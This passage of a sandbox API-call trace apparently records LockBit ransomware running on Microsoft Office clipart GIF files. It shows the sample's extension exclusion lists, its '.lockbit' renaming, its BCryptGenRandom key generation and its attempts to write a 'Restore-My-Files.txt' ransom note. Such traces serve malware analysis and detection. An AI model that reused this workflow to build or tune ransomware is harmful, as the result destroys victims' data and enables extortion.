(lpString1="autorun.inf", lpString2="J0143758.GIF") returned -1 [0183.679] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143758.GIF") returned 1 [0183.679] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143758.GIF") returned -1 [0183.679] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.679] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF") returned=".GIF" [0183.679] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.679] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.679] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.679] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.679] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.679] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.679] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.679] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.680] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.680] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.681] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.681] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF.lockbit") returned 85 [0183.681] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143758.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0183.682] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.682] malloc (_Size=0x40068) returned 0x1ff1e60 [0183.682] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1695) returned 1 [0183.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0183.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0183.684] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.689] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.689] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.691] free (_Block=0x1fa2ed8) [0183.691] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.691] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.691] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.691] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x124a, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB00516L.GIF", cAlternateFileName="")) returned 1 [0183.691] lstrcmpiW (lpString1=".", lpString2="WB00516L.GIF") returned -1 [0183.691] lstrcmpiW (lpString1="..", lpString2="WB00516L.GIF") returned -1 [0183.691] PathFindExtensionW (pszPath="WB00516L.GIF") returned=".GIF" [0183.691] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.691] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.691] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.691] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.691] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.691] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.691] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.691] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.691] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.691] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.692] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.692] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.693] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.693] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB00516L.GIF") returned -1 [0183.693] lstrcmpiW (lpString1="ntldr", lpString2="WB00516L.GIF") returned -1 [0183.693] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB00516L.GIF") returned -1 [0183.693] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB00516L.GIF") returned -1 [0183.694] lstrcmpiW (lpString1="autorun.inf", lpString2="WB00516L.GIF") returned -1 [0183.694] lstrcmpiW (lpString1="thumbs.db", lpString2="WB00516L.GIF") returned -1 [0183.694] lstrcmpiW (lpString1="iconcache.db", lpString2="WB00516L.GIF") returned -1 [0183.694] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.694] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF") returned=".GIF" [0183.694] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.694] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.694] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.694] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.695] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.695] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.695] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF.lockbit") returned 85 [0183.695] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00516l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0183.701] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.701] malloc (_Size=0x40068) returned 0x3d70450 [0183.701] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4682) returned 1 [0183.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0183.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.702] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0183.702] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0183.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.707] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.707] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.708] free (_Block=0x1fa2ed8) [0183.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.708] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.709] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2017, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB00531L.GIF", cAlternateFileName="")) returned 1 [0183.709] lstrcmpiW (lpString1=".", lpString2="WB00531L.GIF") returned -1 [0183.709] lstrcmpiW (lpString1="..", lpString2="WB00531L.GIF") returned -1 [0183.709] PathFindExtensionW (pszPath="WB00531L.GIF") returned=".GIF" [0183.709] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.709] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.709] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.710] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.710] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.710] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.710] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.710] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.710] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.711] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB00531L.GIF") returned -1 [0183.711] lstrcmpiW (lpString1="ntldr", lpString2="WB00531L.GIF") returned -1 [0183.711] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB00531L.GIF") returned -1 [0183.711] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB00531L.GIF") returned -1 [0183.711] lstrcmpiW (lpString1="autorun.inf", lpString2="WB00531L.GIF") returned -1 [0183.711] lstrcmpiW (lpString1="thumbs.db", lpString2="WB00531L.GIF") returned -1 [0183.711] lstrcmpiW (lpString1="iconcache.db", lpString2="WB00531L.GIF") returned -1 [0183.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF") returned=".GIF" [0183.711] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.711] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.712] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.712] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.713] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.713] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.713] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.713] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.713] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF.lockbit") returned 85 [0183.713] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00531l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0183.718] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.718] malloc (_Size=0x40068) returned 0x3f70048 [0183.718] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8215) returned 1 [0183.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0183.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0183.720] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0183.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.722] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.722] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.724] free (_Block=0x1fa2ed8) [0183.724] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.724] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.724] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.724] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, 